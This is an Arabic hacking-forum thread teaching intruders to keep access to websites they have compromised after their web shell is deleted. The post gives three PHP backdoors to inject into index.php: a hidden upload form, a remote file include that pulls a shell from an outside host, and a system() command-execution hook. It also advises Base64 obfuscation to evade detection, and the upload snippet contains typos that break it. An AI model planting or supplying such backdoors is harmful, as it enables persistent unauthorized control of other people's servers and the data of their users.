استعادة الشل الخاص بك بعد استعادة الموقع

استعادة الشل الخاص بك بعد استعادة الموقع


النتائج 1 إلى 2 من 2

الموضوع: استعادة الشل الخاص بك بعد استعادة الموقع

  1. #1

    Come استعادة الشل الخاص بك بعد استعادة الموقع

    السلام عليكم
    الكثير منا يعاني بعد اختراقه لسيرفر ما من أن يتم حذف الشل الخاص به و كما نعلم أن الشل هو سكريبت برمجي يسمح و يسهل عملية التحكم بالموقع المخترق أي التنقل , التعديل و الحذف .....
    و بعد أن تريد اخترقه مجددا تجد أن الثغرة قد تم اقفالها !
    +++++++++++++++++++++++
    اذا ما الحل ؟
    توجد العديد من الطرق لتلغيم الموقع لتتمكن من العودة اليه مجددا
    +++++++++++++++++++++++
    -أولا : مركز رفع خفي حيث نقوم بوضع المتغير id=dz و هو الذي يقوم باظهار مركز الرفع على الموقع , حيث نفترض أننا حقنا ملف index.php بالكود أسفله ليصبح الاستغلال هكذا : http://site.com/index.php?id=dz
    الكود :
    <?php
    $id = $_GET['id'];
    if($ids == 'dz'){
    $anondz = $_FILES['file']['name'];
    $anonymousdz = $_FILES['file']['tmp_name'];
    echo "<form method='POST' enctype='multipart/form-data'>
    <input type='file'name='file' />
    <input type='submit' value='upload shell' />
    </form>";
    move_uploaded_file($anonymousdz,$anondzl);
    }
    ?>
    ++++++++++++++++++++++
    -ثانيا : استخدام دالة احضار ملفات خارجية , يعني أننا سوف نقوم باحضار ملف شل خارجي من موقع ما بمجرد وضع الرابط الخاص به
    مثلا حقنا الكود في ملف index.php
    http://site.com/index.php?id=http://black.com/shell.php
    أي أننا نقوم برفع الشل برابط مباشر باسخدام المتغير
    الكود :
    <?php
    $dz=$_GET['id'];
    include $dz;
    +++++++++++++++++++++++
    -ثالثا : استخدام دالة تنفيذ الأوامر من خلال الدالة System
    أي يمكننا هذا الكود من تنفيذ الأوامر على السيرفر , مثلا نحقن الملف index.php بالكود أسفله , فيمكن تنفيذ الأوامر هكذا :
    http://site.com/index.php?dz=id
    هكذا وضعنا الأمر id بعد المتغير "dz" طبعا id تعطينا صلاحياتنا على السيرفر
    الكود :
    <?php
    $anonymous=$_GET['dz'];
    system($anonymous);
    ?>
    +++++++++++++++++++++++
    ملاحظات :
    -طبعا تلغيم الملفات باحدى هذه الأوامر يتم في ظل اختراقك للسيرفر و امتلاكك لشل عليه لتقوم بعملية اضافة الأكواد
    - يتعين عليك تشفير الأكواد باستعمال خوارزميات Base64 لكي لا يتم كشفها حيث يمكنك ايجاد مواقع تقوم بالعمل
    ++++++++++++++++++++++++
    أرجوا ان أكون قد أفتدكم
    التعديل الأخير تم بواسطة hacker@dz ; 05-09-2015 الساعة 12:38 AM
    من خبرتي .......

    1-لا اختراق أبدا قبل الحماية
    2-ان لم تتعلم التشفير فأنت لست هكر
    3-لا اختراق بامتداد صورة الا بثغرة نظام
    4-ضروري تعلم اكتشاف واستغلال الثغرات
    5-لابد من وجود شيئ برايفت لك
    6-يستحيل أن تعرف كل شيئ في الاختراق
    7-يستحيل أن تدخل الهكر ولا يخترق جهازك
    8-يستحيل أن تنام من غير ما تفكر في الهكر
    9-يستحيل أن يطرح سيرفر و يظل مشفر أكثر من 24 ساعة
    10-يستحيل أن نرى عالم الهكرمن دون ملغمين
    GOSTE DZ

  2. #2

    افتراضي رد: استعادة الشل الخاص بك بعد استعادة الموقع

    موضوع رائع من عضو رائع ... بالتوفيق

    لا اله الا الله محمد رسول الله




المواضيع المتشابهه

  1. استعادة الملفات , استعادة الملفات المحذوفه
    بواسطة ASDELY-ScOrPiOn في المنتدى منتدى البرامج - تحميل برامج
    مشاركات: 81
    آخر مشاركة: 12-25-2012, 05:09 AM
  2. استعادة الملفات المحذوفة , برنامج استعادة الملفات
    بواسطة Hidden pain في المنتدى منتدى البرامج - تحميل برامج
    مشاركات: 0
    آخر مشاركة: 07-02-2012, 12:04 AM
  3. كيفية استعادة الايميلhotmail
    بواسطة معتز سرطاوي في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 4
    آخر مشاركة: 02-12-2012, 07:56 PM
  4. تم القصف المميز ارفع الشل الخاص بك و اخترق الموقع (xx(-
    بواسطة SOUrRce-x في المنتدى معرض الانجازات
    مشاركات: 8
    آخر مشاركة: 10-17-2011, 02:46 PM
  5. استعادة الباسوورد في Windows 7
    بواسطة reda sarese في المنتدى منتدى الصيانة وتبادل الخبرات
    مشاركات: 8
    آخر مشاركة: 06-29-2011, 12:55 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •